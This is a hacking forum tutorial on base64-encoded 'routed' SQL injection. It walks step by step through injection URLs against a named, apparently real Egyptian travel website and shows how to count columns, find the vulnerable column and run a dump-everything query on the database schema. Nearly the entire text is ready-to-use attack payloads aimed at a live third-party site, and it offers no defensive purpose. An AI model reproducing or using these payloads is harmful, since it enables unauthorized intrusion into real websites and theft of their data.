Base64 Based Routed Query By Kashmiri_Wolf – SQLi Basic

Tutorial On Base64 Based Routed Query By Kashmiri_Wolf

Assalam-O-Alaikum Guys !
This is Kashmiri_Wolf .. Today I Am Gonna Write About Base64 Based Routed Query
We Will Use A New Function Here (New For Newbies Like Me)
Which IS “from_base64()”

SO Lets Get Straight :
Here IS Site :

http://www.egytravelcorner.com/ar/articals-more.php?id=1

Its A Basic Injection Till Dios So Here Is Query For Vuln Column :

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Here Routed Query Is A Way To Dios It (For Pure Union base and $_get method)

Hex I Allowed Here .. But We Will Use Base64 Routed Query Here … Lets Start …
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384 

Here is The Error For Routed Query Lets Fix Query And Get Total Numbers Of Columns (Column Count)
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Query Balanced Lets Check For Order by

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

No Error

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

9 columns lets check for vuln Column

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Vuln Column Is Under Image

Lets Dios :

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

SO Here IS Our Final Query !

Keeping Concept In Mind You Can Also Do Same With Char I guess (Not Tested Yet !!)

Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz

Sorry For Bad Explanation …….. If Any Problem You Can Pm Me Here Kashmiri_Wolf

Thanks To Sqli-Basic For Letting Me Share This 🙂

Regards :
Kashmiri_Wolf




Leave a Reply

Your email address will not be published. Required fields are marked *

Name *
Email *
Website